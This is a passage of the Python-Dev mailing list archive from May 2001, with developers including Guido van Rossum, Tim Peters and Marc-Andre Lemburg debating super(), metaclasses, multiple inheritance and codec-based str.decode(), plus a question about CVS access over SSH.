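        # MyBaseClass[self]: "cast" self to MyBaseClass.
        if not isinstance(obj, cls):
            raise TypeError("%s is not an instance of %s"
                            % (type(obj).__name__, cls.__name__))
        return _Cast(cls, obj)


class Base(metaclass=CastMeta):
    def foo(self, arg):
        return "Base.foo(%s)" % arg


class Derived(Base):
    def foo(self, arg):
        return "Derived.foo, then " + Base[self].foo(arg)
```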

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May  3 07:49:04 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about.  In

class A(B, C):
    def foo(self):
        super.foo()

Guido said that super would start searching at B, but I don't know what your
"continue the search for the method as if it hadn't found the occurrence
calling the basemethod() API" means:  defining what a thing does in terms of
an unspecified API it doesn't use is a pretty sure recipe for compounded
confusion <wink>.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too.  But it's unclear whether he meant that.  Given also

class D(A):
    def foo(self):
        super.foo()

D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next.  But under #1 A.foo() invokes B.foo() or C.foo() next, while
under #2 A.foo() invokes A.foo() again.  Multiple inheritance is a red
herring here -- take C out of A's bases, and the same ambiguity needs to be
resolved.
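The two readings can be made concrete with a small Python 3 simulation. rule1 and rule2 are hypothetical stand-ins for super.foo(). Both search bases depth-first, left to right. rule1 starts from the bases of the class K whose method makes the call. rule2 starts from self.__class__.__bases__. A call counter (MAX_CALLS, also hypothetical) cuts off the loop that rule2 produces.

```python
calls = []
MAX_CALLS = 6  # stops the runaway recursion produced by rule #2


def find_in_bases(bases, name):
    """Depth-first, left-to-right search of `bases` (classic-class order)."""
    for base in bases:
        if name in vars(base):
            return vars(base)[name]
        found = find_in_bases(base.__bases__, name)
        if found is not None:
            return found
    return None


def rule1(K, obj, name):
    # 1) start at the bases of the class that textually contains the call
    return find_in_bases(K.__bases__, name).__get__(obj)


def rule2(K, obj, name):
    # 2) start at the bases of the instance's class; K is ignored
    return find_in_bases(type(obj).__bases__, name).__get__(obj)


class B:
    def foo(self, rule):
        calls.append("B.foo")


class C:
    def foo(self, rule):
        calls.append("C.foo")


class A(B, C):
    def foo(self, rule):
        calls.append("A.foo")
        if len(calls) < MAX_CALLS:
            rule(A, self, "foo")(rule)


class D(A):
    def foo(self, rule):
        calls.append("D.foo")
        rule(D, self, "foo")(rule)


def trace(rule):
    del calls[:]
    D().foo(rule)
    return list(calls)
```

trace(rule1) gives ['D.foo', 'A.foo', 'B.foo']. trace(rule2) gives 'D.foo' followed by 'A.foo' repeated until the counter stops it. The super(K, self) built-in that arrived in Python 2.2 searches type(self).__mro__ after K. In this example it agrees with reading #1, because super(A, D()).foo resolves to B.foo.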


From greg at cosc.canterbury.ac.nz  Thu May  3 07:56:07 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too.  But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From pf at artcom-gmbh.de  Thu May  3 08:29:03 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001  3:39: 8 pm"
Message-ID: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
> 
>    MyBaseClass[self]
> 
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
> 
>    MyBaseClass[self].foo(args)
> 
> Advantages:
> * Concise and uncluttered
> * No new syntax needed
> * Can be implemented using existing mechanisms
> * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
* People will confuse this with calling MyBaseClass.__getitem__(....)
* Doesn't even remotely resemble anything in C++

We have to face it:  I myself don't like C++ either, but a *lot*
of people are already familiar with C++ today.  Giving them
something they are already familiar with will make it easier to
convert some of them to Python.

To Greg: This '::' operator is not at all that ugly and as far as I can see
would not introduce any backward incompatible change to the language.
I'm sure C++ has some other real warts to offer that we both don't
want to see in a future version of Python.  Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From mal at lemburg.com  Thu May  3 09:49:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
> 
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
> 
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is a belief that DictType should implicitly inherit attributes and
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are buried in the "super" part of this
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, SmallTalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__". 

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?

meta1            -->         o klass1
                               o klass1a
                               o klass1b
meta2            -->         o klass2
                               o klass2a
                               o klass2b

class klass3(klass1a, klass2b):
      ...                  

I think there's no clean way to resolve this, so I'd suggest
simply ruling this out and declaring it illegal (a class can
only be based on classes having the same meta-class).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May  3 10:24:16 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com>
	<200105021918.OAA03080@cj20424-a.reston1.va.home.com>
	<3AF052CE.E928BDA1@lemburg.com>
	<200105021938.OAA03550@cj20424-a.reston1.va.home.com>
	<3AF0662D.48671B4E@lemburg.com>
	<3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and its own inverse).

LOL!  Guess what `language' I chose to use when testing Mailman's i18n
support?  :)

-Barry


From fredrik at pythonware.com  Thu May  3 10:11:10 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:
 
> Here's some sample output (Netscape can unscramble this BTW):

heh.  just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)

maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F


From mal at lemburg.com  Thu May  3 11:05:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Here's some sample output (Netscape can unscramble this BTW):
> 
> heh.  just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
> 
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
> 
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first
two paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as
basis). 

Still, it serves as a nice example of what str.decode()
and str.encode() can be used for and also demonstrates how
easy it is to install new codecs.
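Marc-Andre's codec itself is not reproduced in this excerpt. As a rough idea of what installing a codec involves, here is a Python 3 sketch that registers a search function with the codec registry. The codec name `demo_rot13` and the helper names are hypothetical; Python 3's standard library already ships a `rot_13` codec, and since `str` no longer has a `decode()` method there, text-to-text codecs are reached through `codecs.encode()` and `codecs.decode()`:

```python
import codecs

# Translation table for ROT13: each ASCII letter moves 13 places.
_ROT13 = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

def rot13(text, errors="strict"):
    # Codec functions return (output, number_of_input_items_consumed).
    return text.translate(_ROT13), len(text)

def search(name):
    # The registry calls this with the normalized encoding name.
    if name == "demo_rot13":
        # ROT13 is its own inverse, so encode and decode share one function.
        return codecs.CodecInfo(rot13, rot13, name="demo_rot13")
    return None

codecs.register(search)

secret = codecs.encode("Hello", "demo_rot13")
print(secret)                                  # Uryyb
print(codecs.decode(secret, "demo_rot13"))     # Hello
```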

I think I'll repost it to c.l.p though -- with a new secret 
attached to it ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Thu May  3 16:26:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
             <3AF10D91.802C8555@lemburg.com> 
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
            <3AF10D91.802C8555@lemburg.com> 
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is belief that DictType should implicitly inherit attributes and 
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"<type 'DictType'>".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "<foo object at 0x......>".

But this method is overridden by DictType, so doesn't come into play.
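In today's Python 3, where DictType is simply `dict`, TypeType is `type`, and the then "not yet existing" ObjectType became `object`, the instance-versus-inheritance distinction can be checked directly. A small sketch:

```python
d = {1: 2}

# `dict` is an *instance* of the metaclass `type` ...
assert type(dict) is type
# ... but it *inherits* only from `object`, not from `type`.
assert dict.__mro__ == (dict, object)
assert not issubclass(dict, type)

# repr() of the class object is looked up on its metaclass:
print(repr(dict))             # <class 'dict'>
print(type.__repr__(dict))    # <class 'dict'>

# dict.__repr__ is the method for dict *instances*; it overrides
# object.__repr__, which would otherwise give the generic form.
print(dict.__repr__(d))       # {1: 2}
print(object.__repr__(d))     # <dict object at 0x...>
```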

Requiring explicit inheritance (whatever that may be) won't fix the
problem.

> Some of these ideas are buried in the "super" part of this
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.  Given

  class D(A, B, C):
    def foo(self):
      super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
    def foo(self):
      D1.foo(self)
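The D1 definition above can be run as-is in Python 3 and compared with the built-in `super()`, which arrived later. For a hierarchy without shared bases, and an instance whose class is exactly D, both give the same answer; for instances of further subclasses, `super()` follows the subclass's MRO, which can differ. The method bodies are illustrative:

```python
class A:
    pass

class B:
    def foo(self):
        return "B.foo"

class C:
    def foo(self):
        return "C.foo"

# The reference definition: super.foo in D means D1.foo, where D1 has
# D's bases and no body of its own.
class D1(A, B, C):
    pass

class D(D1):
    def foo(self):
        return D1.foo(self)

# The same call written with Python 3's super().
class DSuper(A, B, C):
    def foo(self):
        return super().foo()

print(D().foo())        # B.foo
print(DSuper().foo())   # B.foo
```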

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the same name defined in each of the base classes,
e.g.

  class C(A, B):
    def save(self):
      A.save(self)
      B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

      B.save(self)			# current Python
      B.__dict__['save'](self)		# ditto, butt ugly
      B::save(self)			# C++
      B._.save(self)			# Don Beaudry
      B.instanceMethods.save(self)	# ???

I still like current Python best!
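To see why a single "super" call is not enough for the save() case, here is a Python 3 sketch contrasting the explicit spelling with `super()` when the base methods do not pass the call along. The `log` attribute exists only to record which methods ran:

```python
class A:
    def save(self):
        self.log.append("A.save")

class B:
    def save(self):
        self.log.append("B.save")

class C(A, B):
    def __init__(self):
        self.log = []

    def save(self):
        # Name each base explicitly so both versions run.
        A.save(self)
        B.save(self)

class CSuper(A, B):
    def __init__(self):
        self.log = []

    def save(self):
        # super() finds only the next save() in the MRO (A.save), and
        # A.save does not pass the call on, so B.save never runs.
        super().save()

c = C()
c.save()
print(c.log)     # ['A.save', 'B.save']

cs = CSuper()
cs.save()
print(cs.log)    # ['A.save']

# The "butt ugly" spelling performs the same lookup by hand.
B.__dict__["save"](c)
print(c.log)     # ['A.save', 'B.save', 'B.save']
```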

> As Jim mentioned in his reply to Thomas' question, SmallTalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__". 

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
> 
> meta1            -->         o klass1
>                                o klass1a
>                                o klass1b
> meta2            -->         o klass2
>                                o klass2a
>                                o klass2b
> 
> class klass3(klass1a, klass2b):
>       ...                  
> 
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it checks whether any of the other base classes
are not standard classes, and if so, gives control to the first such
base class.  Another way to say this is that the first base class that
has a non-standard metaclass gets control.
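The rule as interpreted above can be written as a small function. This is a sketch, not ExtensionClass code: `controlling_metaclass` is a hypothetical helper, and `type` stands in for the "standard class" metaclass of 2001. For contrast, Python 3 (much later) does not pick a winner but requires one metaclass to be a subclass of all the others:

```python
class Meta1(type):
    pass

class Meta2(type):
    pass

def controlling_metaclass(bases, standard=type):
    # The first base whose metaclass is not the standard one gets
    # control; if there is none, the standard metaclass is used.
    for base in bases:
        if type(base) is not standard:
            return type(base)
    return standard

class Plain: pass
class K1(metaclass=Meta1): pass
class K2(metaclass=Meta2): pass

print(controlling_metaclass((Plain, K1, K2)).__name__)  # Meta1
print(controlling_metaclass((Plain,)).__name__)         # type

# Python 3 rejects unrelated metaclasses outright ...
try:
    class K3(K1, K2): pass
except TypeError as exc:
    print("TypeError:", exc)

# ... unless a metaclass deriving from both is supplied.
class Meta3(Meta1, Meta2): pass
class K4(K1, K2, metaclass=Meta3): pass
print(type(K4).__name__)  # Meta3
```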

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May  3 16:28:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
             <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > Actually, I think that what's in the __dict__ is just perfect
> 
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May  3 16:26:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for a while I thought maybe someone here would be able
to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port "nnn".
Using SSH to establish an interactive session to server is no problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro@server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro@firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip


From mal at lemburg.com  Thu May  3 18:08:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
	            <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
> 
> > We are actually trying to turn classes into types here :-)
> 
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) 

BTW, can you give a good starting point into all this (code-wise
and concept-wise)? I'd like to play around with these new concepts
a little to get a better feeling for the possible issues (I should
have done the same for the coercion stuff a year ago: implementing
mxNumber I now find that some important hooks are missing :-().
 
> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
> 
> Sorry, you still seem to be confused about this. 

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to another object".

In that sense, instances inherit from their classes and 
classes from their base-classes:

meta-class M ->        o base-class A
                         o class B
                           o instance x = B()  

Meta-class M controls this "inheritance scheme" and can modify
it depending on its needs. 

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not 
defined in B or as instance attribute of B(). Querying x.a would then 
launch this process:

1. x.a -> fails
2. M.__findattr__(x, 'a') is called to find and return the
   attribute
3. M.__findattr__ asks B for an attribute 'a' -> fails
4.    -- " --     asks A       -- " --        -> success
5.    -- " --     returns the found attribute
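Steps 1 to 5 amount to forwarding the lookup along a chain. `__findattr__` is a proposed hook, not an existing Python API, so the sketch below uses a hypothetical plain function `find_attr` instead. It deliberately ignores descriptors and method binding; in today's Python 3 this walk happens roughly inside `object.__getattribute__`, chosen by the instance's class rather than by the metaclass:

```python
def find_attr(obj, name):
    """Hypothetical stand-in for the proposed M.__findattr__(x, name)."""
    # Step 1: the instance's own attributes.
    if name in vars(obj):
        return vars(obj)[name]
    # Steps 3-5: forward the lookup to the class, then to each base
    # class in turn, returning the first match.
    for klass in type(obj).__mro__:
        if name in vars(klass):
            return vars(klass)[name]
    raise AttributeError(name)

class A:
    a = "defined in A"

class B(A):
    pass

x = B()
print(find_attr(x, "a"))   # defined in A
```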

I know that this is somewhat different under the covers than
what's happening now, but the Python programmer will not notice
this. It most probably does not work well with the Don Beaudry
hook though... so maybe I'm simply on the wrong track here.

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.  This is needed so that repr(DictType) returns
> "<type 'DictType'>".  It is *not* inherited from TypeType!
> 
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "<foo object at 0x......>".
> 
> But this method is overridden by DictType, so doesn't come into play.
> 
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.

With "explicit inheritance" I meant that the programmer has to
take care of passing the lookup on to the meta-class, rather
than applying some magic which hooks together class and meta-
class.
 
> > Some of these ideas are buried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
> 
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
> 
>   class D(A, B, C):
>     def foo(self):
>       super.foo(self)
> 
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
> 
>   class D1(A, B, C): pass
>   class D(D1):
>     def foo(self):
>       D1.foo(self)

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the same name defined in each of the base classes,
> e.g.
> 
>   class C(A, B):
>     def save(self):
>       A.save(self)
>       B.save(self)
> 
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
> 
>       B.save(self)                      # current Python
>       B.__dict__['save'](self)          # ditto, butt ugly
>       B::save(self)                     # C++
>       B._.save(self)                    # Don Beaudry
>       B.instanceMethods.save(self)      # ???
> 
> I still like current Python best!

But it doesn't help us in the very common case of mixin classes,
since there neither the method nor sometimes even the programmer
will know where the base method to call lives. This is why I
wrote the basemethod() helper: it looks up the right method
at run-time and thus allows writing mixin-classes which override
methods of other classes which are only known to the programmer
using the mixin and not necessarily to the one writing the mixin.
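The basemethod() helper itself is not shown in this thread, so the following is not that helper. It is a sketch of how Python 3's cooperative `super()`, which arrived after this discussion, handles the mixin case: the mixin never names the class that provides the "real" method. All class names are hypothetical:

```python
class Store:
    def __init__(self):
        self.log = []

    def save(self):
        self.log.append("Store.save")

class LoggingMixin:
    def save(self):
        self.log.append("LoggingMixin.save")
        # The mixin never names Store: super() picks the next save()
        # from the MRO of the instance's class at run time.
        super().save()

class LoggedStore(LoggingMixin, Store):
    pass

s = LoggedStore()
s.save()
print(s.log)   # ['LoggingMixin.save', 'Store.save']
```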
 
> > As Jim mentioned in his reply to Thomas' question, SmallTalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
> 
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.
 
> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
> 
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitly binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have had some great experiences with loosely coupled object
systems and don't want to miss their flexibility anymore.)

> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> > meta1            -->         o klass1
> >                                o klass1a
> >                                o klass1b
> > meta2            -->         o klass2
> >                                o klass2a
> >                                o klass2b
> >
> > class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
> 
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it looks if any of the other base classes
> are not standard classes, and if so, gives control to the first such
> base class.  Another way to say this is that the first base class that
> has a non-standard metaclass gets control.

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paul at pfdubois.com  Thu May  3 18:24:40 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):


1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

class X (Y rename foo as _sfoo,
                  bar as _sbar
        ):
    def foo (self):
        self._sfoo()
        myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

class D (B rename a1 as ba1, C rename a1 as ca1):

     can now use self.ca1, self.a1

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.


From donb at abinitio.com  Thu May  3 18:47:29 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
